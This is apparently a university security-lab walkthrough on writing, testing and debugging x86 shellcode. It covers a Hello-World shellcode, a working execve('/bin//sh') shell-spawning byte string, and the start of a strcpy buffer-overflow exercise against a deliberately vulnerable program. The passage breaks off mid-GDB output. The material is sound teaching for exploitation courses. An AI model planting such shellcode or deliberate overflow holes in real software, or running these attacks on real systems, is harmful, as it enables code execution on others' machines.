$plugins['authad'] = '0';
$plugins['authldap'] = '1';
$plugins['authmysql'] = '0';
$plugins['authpgsql'] = '0';
= Shellcode Walkthrough =
== Resources ==
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-slides.pdf|Slides]]
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-skel.zip|Tasks archive]]
[[http://shell-storm.org/shellcode/|Shellcode repository]]
== Initial info ==
When creating an attack vector the attacker would usually aim to run a shellcode. However, due to program specifics and modern attack prevention mechanisms, it is uncommon for an attack to consist of a single step. There is no recipe, and an attacker will combine multiple steps and actions for the attack to be successful.
An attacker will typically employ information leak attacks to extract address and values, would use buffer overflow attacks to overwrite sensible data, inject shellcodes and execute them by modifying the program control flow and others. The way these steps are woven together depends on the vulnerability and the program specifics. The attacker is the one that needs to find the best way to tie these steps together to exploit the vulnerability.
When doing a shellcode-based attack, the attacker needs to execute code from that shellcode into memory. For that to happen, the attacker needs to run three steps:
- The attacker needs to create the shellcode. This is typically done by writing assembly code and then assembling that code into binary code.
- The attacker places the shellcode inside the vulnerable process address space. This is done by feeding the binary shellcode as input: standard input, program arguments, reading from sockets, environment variables.
- The attacker needs to trigger the execution of the shellcode. This means altering the program control flow by typically altering a function return address or a function pointer to point to the start of the shellcode.
While the above three steps are not necessarily chronological, one can identify each of them as parts of a shellcode-based attack.
== Shellcode ==
A //shellcode// is a little piece of binary data that is meant to be executed by a process as part of an attack vector. An attacker would usually place a shellcode in the process memory and aim to execute it to trigger an advantageous effect for the attacker.
While a shellcode would typically result in the attacker gaining a shell process by the means the of the [[http://man7.org/linux/man-pages/man2/execve.2.html|execve]] system call, this needn't always be the case. Some shellcodes may result in writing data to a socket, scanning the memory, opening/creating a file and many others.
A shellcode is typically written in assembly language and then compiled into binary object code and fed to the vulnerable program. There are three actions an attacker must undertake to run a shellcode in a vulnerable program:
- Write the shellcode: typically done in assembly and then convert it in binary object code.
- Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.).
- Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow.
== Reminder: Generating/writing binary data ==
When dealing with shellcodes, we work with binary data and we need to be able to generate that. One example is when we need to write an hexadecimal address such as ''0x0804804b''. Shellcodes may also need to be written in a file or be fed directly to the process. Generating (binary) data and writing it is a common process when creating attack vectors, especially when dealing with shellcodes.
In order to generate binary data, one can use any programming language, though it is common to use Bash (shell commands), Python or Perl. Let's write the hexadecimal address ''0x0804804b'' to standard output using different approaches. The commands to do this are:
$ echo -e '\x4b\x80\x04\x08'
K�
$ python -c 'print "\x4b\x80\x04\x08"'
K�
$ perl -e 'print "\x4b\x80\x04\x08"'
K�
The binary data is not readable from a console. You can either pipe to a hex dumping command (such as ''hexdump'' or ''xxd'' or ''od'') or you can dump it to a file:
$ python -c 'print "\x4b\x80\x04\x08"' | od -t x4
0000000 0804804b 0000000a
$ perl -e 'print "\x4b\x80\x04\x08"' > dump
$ od -t x4 dump
0000000 0804804b
0000004
In the snippets above, the reason for the the ''0000000a'' string in the output processed from Python is due to the Python ''print'' command explicitly adding a newline character (''\n'', ''0x0a'' in hexadecimal) to the output string.
Python and Perl may also be used to generate a string that repeats a character a number of times. For example, if we wanted to generate 50 ''A'' characters followed by the above address we could issue the commands:
$ python -c 'print "A"*50 + "\x4b\x80\x04\x08"' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4b80 0408 0a AAK...
$ perl -e 'print "A"x50,"\x4b\x80\x04\x08"' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4b80 0408 AAK...
We've used ''xxd'' to dump hexadecimal data.
Please note that a hexadecimal dump will print a dot (''.'') when the corresponding byte is a non-printable character (i.e. non-ASCII).
== Reminder: Disassembling a raw binary file ==
It is usually the case that we have access to the raw (binary) shellcode (that we may have generated) and we want to make sure it does exactly what we want it to do. For that we want to disassemble the binary shellcode.
In the ''binary-shellcode/'' subfolder in the tasks archive there is a file named ''shellcode.bin'' that is a binary file:
$ xxd shellcode.bin
00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh
00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............
00000020: b804 0000 00cd 80
We can see there are some strings part of the file and we want to disassemble it as a raw file. For that we use ''objdump'' with the proper arguments:
$ objdump -D -b binary -m i386 -M intel shellcode.bin
shellcode.bin: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 68 21 0a 00 00 push 0xa21
5: 68 6f 72 6c 64 push 0x646c726f
a: 68 6f 2c 20 57 push 0x57202c6f
f: 68 48 65 6c 6c push 0x6c6c6548
14: ba 0e 00 00 00 mov edx,0xe
19: 89 e1 mov ecx,esp
1b: bb 01 00 00 00 mov ebx,0x1
20: b8 04 00 00 00 mov eax,0x4
25: cd 80 int 0x80
The above command does raw disassembling, the arguments meaning:
* ''-D'': disassemble all, not only text/code zones. In our case this means disassemble the whole file.
* ''-b binary'': treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE).
* ''-m i386'': the machine code inside the binary file is i386 (x86).
* ''-M intel'': when disassembling use Intel assembly syntax, as opposed to the AT&T assembly syntax.
The binary file is indeed a shellcode: a short set of instructions that end in a system call (''int 0x80''). This shellcode invokes the number 4 system call, i.e. ''write'' (''eax'' is 4). It writes to file descriptor ''1'' (''ebx'' is ''1'') meaning standard output. What is shellcode does is write the ''Hello, World!\n'' string to standard output.
This binary shellcode file was obtained by writing a byte string. The byte string is stored in the ''shellcode.print'' and we can regenerate the raw shellcode file through a command such as:
$ cat shellcode.print
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
$ echo -en '\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80' > shellcode-2.bin
$ cmp shellcode.bin shellcode-2.bin
As the last command (''cmp'') issues no output, we know the ''shellcode-2.bin'' file we generated is identical to the initial file.
=== Task: Create and disassemble binary shellcodes ===
Let's practice the generation and investigation of binary shellcodes.
Extract the byte strings from these two shellcodes ([[http://shell-storm.org/shellcode/files/shellcode-216.php|1]], [[http://shell-storm.org/shellcode/files/shellcode-827.php|2]]) and generate binary shellcode files. Then disassemble these binary shellcode files and check with the initial links that the assembly code is similar.
== Testing a shellcode ==
Now that we know what a shellcode is, how does it look like and how can we verify it through disassembling, let's test one. In the ''hello-shellcode/'' subfolder in the tasks archive we have developed a very small program (''vuln.c'') for testing the shellcode.
The ''vuln.c'' program is very simple. What it does is define a ''shellcode'' string and initialize it to our earlier byte string shellcode for printing "Hello, World!". In main we define a function pointer ''func_ptr'' and initialize it forcefully (through a type cast) to the ''shellcode'' string. Then we call ''func_ptr'' which will result in the execution of the binary code within the ''shellcode'' string.
In order to test it, we will first compile the program using ''make''
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
resulting in the generation of the ''vuln'' executable.
Then we will run the ''vuln'' executable:
$ ./vuln
Hello, World!
Segmentation fault
and see that it really gets to execute the shellcode, since the "Hello, World!" string is printed to standard output. So the testing of the shellcode is successful.
The running of the executable also results in the process being delivered a segment violation signal (''SIGSEGV'', resulting in the ''Segmentation fault'' message being printed out), but we'll get to that later.
The linker used the ''-zexecstack'' option. This option is required to be able to execute code from the data section where the ''shellcode'' string is located. This is a trick from our side to allow the execution of code from commonly non-executable program sections; in modern programs these program sections are usually non-executable and other actions need to bypass these limitations. We will discuss about those in the future sessions.
=== Reminder: System calls and use of strace ===
A shellcode will usually do any sort of action through the use of system calls. In the test above we used the ''write'' system call (i.e. system call number ''4'', stored in ''eax'') to print the "Hello, World!" message. A system call is the most basic way of doing actions by directly accessing the operating system interface (i.e. the system call interface). The programmer stores the system call number in the ''eax'' register and the parameters in the other registers (''ebx'', ''ecx'', ''edx'', ''esi'', ''edi'') and then issue the system call trap through the ''int 0x80'' instruction.
We can check the usage of system calls in a shellcode by disassembling the binary system call file and checking the presence of the ''int 0x80'' trap instruction. The experienced hacker would also check the binary string for the string ''\xcd\x80'', that is the binary string representation of the ''int 0x80'' trap instruction.
If we want to check the shellcode is being run or debug it, we can use ''strace'' for monitoring system calls. For our above program we can check the calling of the ''write'' system call with ''strace''
$ strace ./vuln
execve("./vuln", ["./vuln"], [/* 36 vars */]) = 0
[...]
write(1, "Hello, World!\n", 14Hello, World!
) = 14
[...]
''strace'' is able to show us the correct invocation of the ''write'' system call, with the proper arguments.
Another way of doing runtime investigation is through the use of GDB as shown in the next section.
''strace'' is very useful for troubleshooting shellcode execution. There may be times when a shellcode appears OK when doing static analysis (i.e. disassembling) but it doesn't work properly. ''strace'' is a quick way to check that the system calls that we expect to happen are done properly (i.e. they use proper arguments).
=== Using GDB to inspect the shellcode ===
Thorough dynamic investigation of the shellocde is achieved through the use of GDB. We will start the ''vuln'' executable under GDB and then we will see what happens when ''func_ptr'' gets called.
We will start the program under GDB (with [[https://github.com/longld/peda|PEDA]] support), breakpoint at main and check the disassembling of the code:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
[...]
[-------------------------------------code-------------------------------------]
0x80483d6 : mov ebp,esp
0x80483d8 : push ecx
0x80483d9 : sub esp,0x14
=> 0x80483dc : mov DWORD PTR [ebp-0xc],0x80484c0
0x80483e3 : mov eax,DWORD PTR [ebp-0xc]
0x80483e6 : call eax
0x80483e8 : mov eax,0x0
0x80483ed : add esp,0x14
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, main () at vuln.c:14
14 void (*func_ptr)(void) = (void (*)(void)) shellcode;
gdb-peda$
The current ''mov'' instruction and the next one (at addresses ''main+17'' and ''main+24'') result in ''eax'' being initialized to ''0x80484c0''. This is the equivalent of the ''func_ptr'' function pointer being initialized to the address of the ''shellcode'' string, as can be seen in the last part of the GDB output. We'll step two instructions (using the GDB ''si'' command) and check that:
gdb-peda$ si
[...]
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0x80484c0 --> 0xa2168 ('h!\n')
[...]
[-------------------------------------code-------------------------------------]
0x80483d9 : sub esp,0x14
0x80483dc : mov DWORD PTR [ebp-0xc],0x80484c0
0x80483e3 : mov eax,DWORD PTR [ebp-0xc]
=> 0x80483e6 : call eax
0x80483e8 : mov eax,0x0
0x80483ed : add esp,0x14
0x80483f0 : pop ecx
0x80483f1 : pop ebp
[...]
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080483e6 17 func_ptr();
gdb-peda$ p/x &shellcode
$1 = 0x80484c0
gdb-peda$
As expected, ''eax'' is now initialized to ''0x80484c0'', the address of the ''shellcode'' string, as shown in the last GDB command.
The next instruction issued is ''call eax''. This means that we will jump and execute code starting from the address in ''eax'', i.e. the address of the ''shellcode'' string, our shellcode. We will issue multiple step instructions command to see our program go through the shellcode instructions until reaching the system call trap instruction (''int 0x80''):
gdb-peda$ si
[...]
gdb-peda$ si
[...]
gdb-peda$ si
[...]
[...]
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd2fc ("Hello, World!\n")
EIP: 0x80484e5 --> 0x10080cd
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484d9 : mov ecx,esp
0x80484db : mov ebx,0x1
0x80484e0 : mov eax,0x4
=> 0x80484e5 : int 0x80
0x80484e7 : add BYTE PTR [ecx],al
0x80484e9: sbb eax,DWORD PTR [ebx]
0x80484eb: cmp ebp,DWORD PTR [eax]
0x80484ed: add BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484e5 in shellcode ()
Before executing the system call trap we can see that the registers are filled properly:
* ''eax'' is ''4'', i.e. the number of the ''write'' system call
* ''ebx'' is ''1'', i.e. the file descriptor for standard output
* ''ecx'' points to the "Hello, World!\n" string located on the stack
* ''edx'' is ''14'' (''0xe'') the length of the "Hello, World!\n" string
When issuing the next instruction (the system call trap), the ''write'' system call will be invoked, resulting in the printing of the "Hello, World!\n" string.
The program will continue executing instructions that it interprets past the ''shellcode'' string. At a certain point these instructions are not going to be valid resulting in the delivery of the ''SIGSEGV'' signal and the program terminating its execution.
== Getting a binary and byte string shellcode ==
Up until now we've learned about getting a binary shellcode from a byte string shellcode using Bash, Python or Perl and on disassembling a raw binary shellcode to assembly format to check the shellcode instructions.
But we need to do it the other way around. We construct a shellcode using assembly and then we need to obtain its binary format and then its byte string format. The byte string format is the usual form we are going to use the shellcode in programs (be them C, Python, Perl or other programs).
In the ''gen-hello-shellcode/'' subfolder in the tasks archive there is the ''shellcode.S'' file, an assembly file implementing the shellcode printing "Hello, World!\n" that we have used above. We'll use that to create the binary shellcode file and then the byte string shellcode. These steps are similar for any shellcode we would create.
First of all we will use ''nasm'' to assemble the ''shellcode.S'' file in the ''shellcode.bin'' file:
$ nasm -o shellcode.bin shellcode.S
By default, ''nasm'' assembles the given assembly code into raw (also named //flat-form//) binary data. We can inspect the ''shellcode.bin'' file and disassemble it to check whether we did OK:
$ xxd shellcode.bin
00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh
00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............
00000020: b804 0000 00cd 80 .......
$ objdump -D -b binary -m i386 -M intel shellcode.bin
shellcode.bin: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 68 21 0a 00 00 push 0xa21
5: 68 6f 72 6c 64 push 0x646c726f
a: 68 6f 2c 20 57 push 0x57202c6f
f: 68 48 65 6c 6c push 0x6c6c6548
14: ba 0e 00 00 00 mov edx,0xe
19: 89 e1 mov ecx,esp
1b: bb 01 00 00 00 mov ebx,0x1
20: b8 04 00 00 00 mov eax,0x4
25: cd 80 int 0x80
As the output of the disassembling is identical to the initial assembly file (''shellcode.S'') we know we have the correct binary shellcode.
Now we need to extract the byte string shellcode from the binary shellcode file ''shellcode.bin''. We could do this by hand, going through each byte printed out by ''xxd'' and building up the string, but we can automate this by using ''hexdump'' and its ''-e'' option for formatting:
$ hexdump -v -e '"\\" 1/1 "x%02x"' shellcode.bin; echo
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
The ''hexdump'' command, with the given arguments prints each byte with a format such as ''\xAB'' where ''AB'' is the two nibbles hexadecimal representation of the number.
All of the above steps are incorporated in the ''Makefile'' file in the ''gen-hello-shellcode/'' subfolder. For getting the binary shellcode file, we would issue the command:
$ make
nasm -o shellcode.bin shellcode.S
The above command assembles the ''shellcode.S'' file into the ''shellcode.bin'' file.
In order to obtain the byte string file, we would issue the command:
$ make print
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
resulting in the printing of the shellcode in byte string format.
The byte string shellcode can now be integrated into our code and it can be properly placed for execution inside a vulnerable program.
== Graceful return/exit from shellcode ==
In the above running of the shellcode the processes ended (crashed) by receiving a ''SIGSEGV'' signal. This happened because the shellcode binary code didn't "end" and the execution of binary code continued beyond the shellcode; when reaching an invalid binary instruction, the program crashes.
In order to avoid that and let the program return from the shellcode or exit gracefully after running the shellcode, we have two options:
- ending the shellcode with a ''ret'' instruction, resulting in the program getting back to the caller function (''main'');
- adding an ''exit'' system call at the end of the shellcode
Let's do the first one. A rather simple approach would be to add the ''ret'' instruction at the end of the shellcode. We do that
by adding a ''ret'' instruction at the end of the ''shellcode.S'' file in the ''gen-hello-shellcode/'' subfolder in the tasks archive:
$ cat shellcode.S
BITS 32
push 0x0a21 ; "\n!"
push 0x646c726f ; "dlro"
push 0x57202c6f ; "W, o"
push 0x6c6c6548 ; "lleH"
mov edx, 14 ; Message length is 14 bytes.
mov ecx, esp ; Stack points to message.
mov ebx, 1 ; Print to standard output (fd = 1).
mov eax, 4 ; __NR_write
int 0x80
ret
In the above listing we can see the addition of the ''ret'' instruction to the shellcode.
We now need to extract the shellcode byte string and replace in the vulnerable program (''vuln.c''). We do that by using the ''Makefile'' file in the ''gen-hello-shellcode/'' subfolder:
$ make print
nasm -o shellcode.bin shellcode.S
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80\xc3
We now replace the above byte string shellcode in the ''vuln,c'' file in the ''hello-shellcode/'' subfolder:
$ cat vuln.c
[...]
static const char shellcode[] = "\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c"
"\x64\x68\x6f\x2c\x20\x57\x68\x48\x65"
"\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1"
"\xbb\x01\x00\x00\x00\xb8\x04\x00\x00"
"\x00\xcd\x80\xc3";
[...]
We now compile the program using the new shellcode byte string
make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vul
and run it
$ ./vuln
Hello, World!
Segmentation fault
Although we expected the program to exit gracefully it still gets a ''SIGSEGV'' signal. We use ''dmesg'' to find out the faulty address:
$ dmesg | tail -1
[20349.560852] vuln[12204]: segfault at 6c6c6548 ip 000000006c6c6548 sp 00000000ff948540 error 14
We can see that the instruction pointer (''ip'') points to the address ''0x6c6c6548''. This address is a string, we can see that by printing the byte string:
$ echo -e '\x6c\x6c\x65\x48'
lleH
The above message is part of the ''Hello, World!\n'' message that we want to print. We assume that the stack stores additional data (such as our message) causing the ''ret'' instruction not to work properly.
We do a GDB investigation for additional info and see what happens when the ''ret'' instruction is executed within the shellcode:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ si
Hello, World!
[----------------------------------registers-----------------------------------]
EAX: 0xe
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd2fc ("Hello, World!\n")
EIP: 0x80484e7 --> 0xc3
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484db : mov ebx,0x1
0x80484e0 : mov eax,0x4
0x80484e5 : int 0x80
=> 0x80484e7 : ret
0x80484e8 : add BYTE PTR [eax],al
0x80484ea: add BYTE PTR [eax],al
0x80484ec: add DWORD PTR [ebx],ebx
0x80484ee: add edi,DWORD PTR [ebx]
[------------------------------------stack-------------------------------------]
0000| 0xffffd2fc ("Hello, World!\n")
0004| 0xffffd300 ("o, World!\n")
0008| 0xffffd304 ("orld!\n")
0012| 0xffffd308 --> 0xa21 ('!\n')
0016| 0xffffd30c --> 0x80483e8 (: mov eax,0x0)
0020| 0xffffd310 --> 0x1
0024| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
0028| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484e7 in shellcode ()
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0xe
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd300 ("o, World!\n")
EIP: 0x6c6c6548 ('Hell')
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6c6c6548
[------------------------------------stack-------------------------------------]
0000| 0xffffd300 ("o, World!\n")
0004| 0xffffd304 ("orld!\n")
0008| 0xffffd308 --> 0xa21 ('!\n')
0012| 0xffffd30c --> 0x80483e8 (: mov eax,0x0)
0016| 0xffffd310 --> 0x1
0020| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
0024| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
0028| 0xffffd31c --> 0x80484c0 --> 0xa2168 ('h!\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x6c6c6548 in ?? ()
gdb-peda$
When executing the ''ret'' instruction we see that the instruction pointer points to the ''0x6c6c6548'' address that's actually the string ''Hell''. If we investigate the stack before and after executing the ''ret'' instruction we find that the ''Hell'' string at the top of the stack (address ''0xffffd2fc'') was popped into the instruction pointer (as expected from a ''ret'' instruction). Before executing ''ret'' the stack pointer (''esp'') was ''0xffffd2fc'' and pointed to the ''Hello, World!\n'' string; after executing ''ret'' the first four bytes from the stack (32 bits) were popped from the stack and placed into the instruction pointer (''eip'') and the stack pointer is incremented; that means ''eip'' now stores the ''Hell'' string and ''esp'' is ''0xfffd300'' and points to the rest of the string ''o, World!\n''.
Our goal is to properly set the stack pointer before executing ''ret'' to make a successful return to the ''main'' function.
=== Task: Fix ret instruction in shellcode ===
In order for ''ret'' to work properly, at the time the ''ret'' instruction is executed the stack pointer needs to be identical to the value when the shellcode was executed. That is, we need to increment the stack pointer (''esp'') to point to that value. In the above GDB output, the value is ''0xffffd30c'' and points to the return address in ''main'', exactly what we want:
0016| 0xffffd30c --> 0x80483e8 (: mov eax,0x0)
Update the shellcode to increment the stack pointer (''esp'') to the proper value right before issuing the ''ret'' call. This will mean a graceful return from the shellcode in the ''main'' function. If properly done, there would be no SIGSEGV being delivered to the program.
Use GDB to see what is the difference between ''esp'' at the beginning of the running of the shellcode and before doing ''ret''. You need to add the required value to ''esp'' right before the ''ret'' instruction in order for the stack to be on the same state it was at the beginning of the shellcode.
Do not store a fixed address in ''esp''. Due to ASLR (//Address Space Layout Randomization//) being enabled, the top of the stack will be different each time is run. Use the ''add'' instruction to update the ''esp'' value and discard the string that was stored on the stack inside the shellcode.
You need to update the ''shellcode.S'' assembly and then obtain the shellcode byte string and update ''vuln.c'' and then compile it and run it.
In case of issues, use GDB to inspect the program. Use ''si'' to go through each instruction in the shellcode and check the stack pointer (''esp''), the instruction pointer (''eip'') and other registers and the stack contents.
=== Task: Use graceful exit in the shellcode ===
Apart from using the ''ret'' instruction to return properly from the shellcode, we can also invoke the ''exit'' system call in the shellcode and terminate the program (gracefully).
Add an equivalent ''exit(0)'' system call in the shellcode using assembly language.
The ''exit'' system call number is ''1''. You may check the ''/usr/include/asm/unistd_32.h'' for confirmation.
The system call number is placed in the ''eax'' register while the first argument is placed in the ''ebx'' register.
== Task: Update string in shellcode ==
Up until now the string we used for printing inside the shellcode is "Hello, World!\n". Let's change this to "Hello, Romania!\n". For this you will have to update the ''shellcode.S'' assembly file and then obtain the byte string shellcode and place it into the ''vuln.c'' file.
Do that and check the program now prints the "Hello, Romania!\n" string to standard output. Update the shellcode that encodes ''exit(0)'' in order for the shellcode to exit gracefully.
Place the string on the stack as done before. It is cumbersome to do that by hand so use the ''-e'' formatting option for ''hexdump''. For example, if trying to create the assembly code for placing the "Hello, World!\n" string on the stack one would issue the comand
$ echo -en 'Hello, World!\n' | hexdump -v -e '1/4 "push 0x%08x\n"' | tac
push 0x00000a21
push 0x646c726f
push 0x57202c6f
push 0x6c6c6548
Adapt the above command, get the assembly code for placing "Hello, Romania!\n" on the stack and the update the shellcode, obtain the byte string, place in into the ''vuln.c'' file, compile the file, run the executable and ... profit! :-)
== Use execve shellcode ==
As the name implies, a shellcode is usually used for getting a shell. This type of shellcode typically ends in the ''execve'' shellcode. Let's try this using the shellcode from [[http://shell-storm.org/shellcode/files/shellcode-827.php|here]]. We've already made sure that the byte string is valid and ends up invoking the ''0xb'' (number ''11'') system call (i.e. ''execve'').
We update the ''shellcode'' variabile ''vuln.c'' using this byte string shellcode:
$ cat vuln.c
[...]
static const char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
[...]
Now we compile the ''vuln.c'' program
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
and then we run it
$ ./vuln
$
We can exit the new shell by running ''exit'' or by using the ''Ctrl+d'' keyboard combo.
After running the executable you get a new shell so our shellcode was successful. We can see that by running the executable under ''strace'' and looking for the ''execve'' call:
$ strace ./vuln
[...]
execve("/bin//sh", ["/bin//sh"], [/* 1 var */]) = 0
[...]
The shellcode was successful and we managed to obtain a new shell.
=== Task: Update the execve shellcode to work properly ===
In the ''bad-execve-shellcode/'' in the lab archive you can find of version of the ''vuln.c'' program that uses the execve-based shellcode from above. Except there are some random integer operations in there. If you compile and run the program you get a //Segmentation fault// error:
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
$ ./vuln
Segmentation fault
The cause of the error is a problem with the shellcode. The shellcode works on certain setups but not all of them due to a negligence of the shellcode author.
The problem is with the ''execve'' system call.
You can use ''strace'' to see the parameters of the ''execve'' system call when running ''./vuln''. That will offer you a hint on why the ''execve'' system call has failed.
Disassemble the shellcode, find out the problem with it and reconstruct it and fix it inside the ''vuln.c'' executable so that you will eventually get a shellcode.
== Use program argument to overwrite local function pointer ==
In the ''vuln.c'' program we used so far, we initialize the ''func_ptr'' function pointer with the "suitable" shellcode address. This is the triggering phase for the shellcode-based attack but that's far from common in programs. What is usually the case is that a buffer is overflowed to overwrite a suitable address.
In the ''overflow-task-and-shellcode/'' there is a ''vuln.c'' source code file. In the file we use ''strcpy()'' to copy the first program argument (''argv[1]'') in a local buffer variable named ''buffer''. If we give a string longer than the buffer length (''32'') we would do a buffer overflow and be able to overwrite the ''func_ptr'' function pointer located just above the buffer. The ''vuln.c'' file is using a proper NUL-free, always-works shellcode that spawns a shell.
Our goal is to provide the proper command line argument in order to overflow the ''buffer'' variable and overwrite the ''func_ptr'' function pointer with the address of the ''shellcode'' variable storing the byte string shellcode.
First of all let's see how the program behaves:
$ make
cc -m32 -Wall -fno-stack-protector -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
cc -m32 -zexecstack vuln.o -o vuln
$ ./vuln
Usage: ./vuln string
$ ./vuln aaa
Do nothing, successfully!
For a short string the program performs OK and the ''do_nothing_successfully'' function stored in the ''func_ptr'' local variable is invoked.
When compiling we are now using the ''-fno-stack-protector'' option to disable the stack protection mechanism (also dubbed //stack canary//). We'll discuss more on that in the next sessions.
Let's now see what happens if we overflow the buffer. We write a lot more bytes than the buffer length (let's say ''50'' bytes) and we check what happens. In order to generate 50 bytes we use ''perl'':
$ perl -e 'print "A"x50'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
In order to feed that input as a program argument to ''vuln'' we use [[http://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html|shell command substitution]]:
$ ./vuln $(perl -e 'print "A"x50')
Segmentation fault
We see that now the program is sent a ''SIGSEGV'' signal. Most probably this is due to the ''func_ptr'' function pointer being overwritten. We check that using ''dmesg'':
$ dmesg
[...]
[38217.667318] vuln[11474]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9475ec error 14
As shown in the ''dmesg'' output the program failed when ''eip'' is ''0x41414141'' (which is the ''AAAA'' string) meaning the ''func_ptr'' local variable was overwritten.
We can also check that using GDB:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ set args $(perl -e 'print "A"x50')
gdb-peda$ start
[...]
gdb-peda$ disass
Dump of assembler code for function main:
[...[
0x08048517 <+84>: push eax
0x08048518 <+85>: call 0x8048350
0x0804851d <+90>: add esp,0x10
[...]
gdb-peda$ b *0x08048518
Breakpoint 2 at 0x8048518: file vuln.c, line 22.
gdb-peda$ b *0x0804851d
Breakpoint 3 at 0x804851d: file vuln.c, line 22.
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd2f0 --> 0x2
EDX: 0xffffd314 --> 0xf7f9d000 --> 0x1a5da8
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 --> 0x0
